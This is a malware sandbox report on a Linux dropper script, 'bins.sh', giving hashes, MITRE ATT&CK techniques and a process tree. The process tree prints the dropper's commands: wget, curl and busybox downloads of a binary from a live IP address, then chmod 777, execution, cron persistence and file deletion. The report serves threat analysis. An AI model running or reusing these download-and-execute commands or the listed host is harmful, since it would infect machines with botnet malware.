10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e

Analysis

max time kernel
149s
max time network
105s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ff11827cacbdfc494c394c5d8e7272db
SHA1

9acddf73007240f35b04f7fe4732d47cd0b04137
SHA256

10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e
SHA512

a045f1446bdb8160644c1e258d5a17327dc5d81b05bda3fddbe70b00007d6b63363d4b98f10a9c1fbcdf87befe5a73a543a4e0f7728feae5ad0e053384968958
SSDEEP

192:JBVtKqN2M/XoDM9VR9/9d9k9I9NGjOHBVtKq8sXU9VR9/9d9k9I9Ton:t2MfoDM9X9/9d9k9I9NG6m2U9X9/9d9y

Score

7^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
754	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	755	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Renames itself 1 IoCs

pid	Process
756	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.fQai3w	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/146/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/572/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/12/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/22/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/772/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/135/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/267/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/300/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/643/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/782/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/784/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/15/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/24/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/25/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/20/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/105/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/136/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/264/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/283/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/16/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/18/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/778/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/786/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/792/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/304/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/590/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/767/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/107/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/314/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/765/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/774/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/776/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/6/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/13/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/23/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/649/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/2/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/8/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/640/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/138/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/752/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/4/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/17/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/43/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/7/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/42/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/14/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/19/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/28/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/642/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/764/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/9/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/10/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/11/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/154/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/166/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/27/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/29/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/41/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/309/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/585/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	wget
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	curl
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:643
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:645
- /usr/bin/wget
  wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Writes file to tmp directory
  PID:647
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:672
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/chmod
  chmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  ./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:755
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:757
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:758
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:759
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:760
- /bin/rm
  rm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  PID:762
- /usr/bin/wget
  wget http://216.126.231.240/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  PID:765

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/var/spool/cron/crontabs/tmp.fQai3w

Filesize
210B

MD5
a8cdc9a79470432ff818c1f0cb667f99

SHA1
23cd257383dd969652ba19f24da2c9dd776adb98

SHA256
c7ae0dd4be7775c6bbfbdd64d1fefdb2a8440ea7ef863d7d7eddd9ce627b607c

SHA512
34c30829afd60c3593dae14e9f623afdab62bddc7c29b61a396d24e9d9c52819bbf4ac1cd7691977678c81eb1f76735f74155a97e181e0bc2d1533a62c94265d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads